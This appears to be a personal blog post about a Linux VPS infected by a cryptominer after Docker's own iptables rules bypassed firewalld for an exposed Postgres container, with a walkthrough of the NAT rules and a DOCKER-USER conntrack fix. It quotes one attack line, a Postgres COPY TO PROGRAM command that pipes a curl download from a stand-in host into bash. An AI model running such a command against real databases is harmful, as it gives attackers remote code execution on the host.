Docker on Linux futzes with its own iptables and so totally sidesteps firewalld/ufw.

Let's rewind.

Friday, October 31: I span up a Postgres instance in a Docker container on one of my VMs for a proof-of-concept demo I'd be doing the next week. I had firewalld configured to deny incoming connections to port 5432, so I didn't even think about securing the database - it surely wouldn't be accessible on the public internet!

Look. What I did here was terrible. I copied and pasted the docker run --name some-postgres -e POSTGRES_PASSWORD=mysecretpassword -d postgres command from the Postgres image, exposed -p 5432 and called it a day.

This was lazy and bad, but I thought that access from the public internet would be blocked. Only another machine inside my tailnet was going to access it. No big deal.

Monday, November 3: Came back after a lovely weekend of not thinking about technology. But alas, the kinsing malware had made its way on the machine and was obliterating my poor 1 vCPU to mine cryptocurrency.

But, how?

Firstly, did you know PostgreSQL can run arbitrary commands on the host machine?

COPY (SELECT '') TO PROGRAM 'curl http://a-very-naughty-server.com/malicious-crypto-miner-install-script.sh | bash';

That'll do it.

Did you also know that the -p 5432 flag binds to 0.0.0.0, an IPv4 address which represents all possible network interfaces - including any connected to the public internet?

Now, this 0.0.0.0 binding isn't something you have to worry about if you're using Docker Desktop on macOS, because you're actually running inside a VM. And that VM only interacts with your host network's localhost. But on Linux that would mean you've basically opened the door to the whole internet, unless you've got a firewall blocking that port.

Which is what I had though, right? That's literally firewalld. The clue is in the name!

$ sudo firewall-cmd --zone=public --list-all
public (default, active)
  target: DROP
  ingress-priority: 0
  egress-priority: 0
  icmp-block-inversion: no
  interfaces: ens3
  sources:
  services: dhcpv6-client http https mdns
  ports:
  protocols:
  forward: yes
  masquerade: no
  forward-ports:
  source-ports:
  icmp-blocks:
  rich rules:

Deny by default! Drop anything that's not http(s), DNS or some thingamajic for IPv6! No port 5432 for you!

Actually, no.

Let's run a basic nginx container and expose container port 80 to port 8000 on the host:

$ docker run --rm -d -p 8000:80 nginx

And then from a totally different computer let's quite happily access that page:

$ curl 104.21.1.191:8000
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>

How is this madness happening? I've said it before, but: it shouldn't be getting through the firewall!?

Alright, let's do this. Hold on to something.

Let's remove some of Docker's functionality, namely its ability to set its own iptables rules and the userland-proxy. We won't worry about what the latter is in this article.

iptables is a very powerful tool that allows you to fiddle around with the netfilter kernel module, which is all very terrifying and cool.

$ echo '{"iptables":false,"userland-proxy":false}' | sudo tee /etc/docker/daemon.json
{"iptables":false}

$ sudo systemctl restart docker

Now, finally, a curl 104.21.1.191:8000 does nothing. It's also broken a whole bunch of other important things to do with container networking, but we won't worry about that.

Let's figure out the IP of the container inside the docker0 bridge network:

docker inspect 1bba7bc8e37f -f ''
172.17.0.2

Now we can muck around with iptables ourselves so that requests to 104.21.1.191:8000 go to 172.17.0.2:80. To do this we'll be using Network Address Translation (NAT), which is how the majority of container networking is handled.

iptables is powerful and complex and probably not worth investing a great amount of time into figuring out, as it's been superseded by nftables.

# PREROUTING run before any other routing decisions; the packet is on the way in
# -p specifies tcp protocol
# --dport is the destination port, so requests to port 8000
# -j jumps to destination NAT (dnat), which changes the packet's destination IP and/or port
# --to-destination specifies what the address ends up as: it's 172.17.0.2:80, aka where our container is running
sudo iptables -t nat -A PREROUTING -p tcp --dport 8000 -j DNAT --to-destination 172.17.0.2:80

# POSTROUTING runs after other routing decisions; the packet is on the way out 
# -s matches packets originating from 172.17.0.2, i.e. our container
# ! -o docker0 will only match packets that aren't trying to exit through the docker0 interface
# -j MASQUERADE will dynamically rewrite the source IP to the host's outgoing adress
sudo iptables -t nat -A POSTROUTING -s 172.17.0.2/32 ! -o docker0 -j MASQUERADE

# Allows packets that are heading to the container to go through the firewall - this rule will occur _after_ the original packet has had its destination address changed
sudo iptables -A FORWARD -p tcp -d 172.17.0.2 --dport 80 -j ACCEPT

# Allows packets that are coming out of the container to go through the firewall
sudo iptables -A FORWARD -p tcp -s 172.17.0.2 --sport 80 -j ACCEPT

Docker doesn't add these exact rules, but these are easier to understand and it's close enough.

What we see here is if a packet arrives at the machine asking for port 80, the rules will transmogrify it to actually be for 172.17.0.2:80 and then it can be flung over to the docker0 bridge network. On the way out, we once again modify the packet so that it goes back out as if it was calling the original packet the entire time.

And we're back:

$ curl 104.21.1.191:8000
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>

We haven't messed with firewalld at all during this. firewalld is still configured to deny the request to port 8000.

This is all fun and games, but why does it clash with firewalld? Well, firewalld (and ufw) also interact with the kernel-level netfilter features, and they end up clashing. Docker's use of iptables will essentially punch a hole straight in whatever you'd asked firewalld to be doing.

This is why I got hacked - I basically left the front door wide open. I'm not complaining. I was rushing around and not paying attention. Docker has all the relevant information nestled within their documentation. Binding a database to 0.0.0.0 is obviously a bad idea, even if you're largely just mucking about. And not changing the password from the one that's listed on the Docker Hub page is literally asking for the trouble.

What can you do about it?

If you don't want to start mucking around with your OS, you could follow a couple of simple rules:

Don't indiscriminantly bind to 0.0.0.0
Don't open a port that you don't want to be open
Have your VPS behind a hardware firewall

The trouble is, I'm extremely cheap and I don't want to change my VPS. And I'm also extremely forgetful, so I'll use -p 5432:5432 at the worst possible time.

Here's the functionality I want:

If there's a request for port 443 via the machine's public interface, that should be allowed
If there's a request for any other port via the machine's public interface, that should be denied
Containers should be able to call out to the internet with impunity, which will require recieving some packets back
Other interfaces, such as tailscale0 should be accepted by default

What I did: added some iptables rules into the DOCKER-USER filter. This is a chain added by Docker as a hook for user customisation.

First we reset all our shenanigans:

$ sudo iptables --table filter --flush FORWARD
$ sudo iptables --table nat --flush PREROUTING
$ sudo iptables --table nat --flush POSTROUTING
$ sudo rm /etc/docker/daemon.json
$ sudo systemctl restart docker

And we could add these rules:

sudo iptables -I DOCKER-USER -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A DOCKER-USER -i ens3 -p tcp --dport 443 -j ACCEPT
sudo iptables -A DOCKER-USER -i ens3 -j DROP

But that won't work because NAT rewrites the destination ports. By the time our filters kick in, the destination port is already 443 on the packet.

Instead, this needs a stateful firewall. That's exactly what conntrack does. It's another kernel module provided as part of the netfilter project, and will let us have knowledge of what our NAT-modified packet looked like before the switcheroo. Let's sudo iptables --table filter --flush DOCKER-USER and give it another go. We want to match on the original destination port of the packet before we run it through NAT.

sudo iptables -I DOCKER-USER -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A DOCKER-USER -i ens3 -p tcp -m conntrack --ctorigdstport 443 -j ACCEPT
sudo iptables -A DOCKER-USER -i ens3 -j DROP

That appears to have given me the behaviour I want, and I haven't had any crypto miners installed on my machine since. Looking forward to seeing what the hackers have planned for thanksgiving and christmas.

Docker Got Me Hacked On Halloween

But, how?

What can you do about it?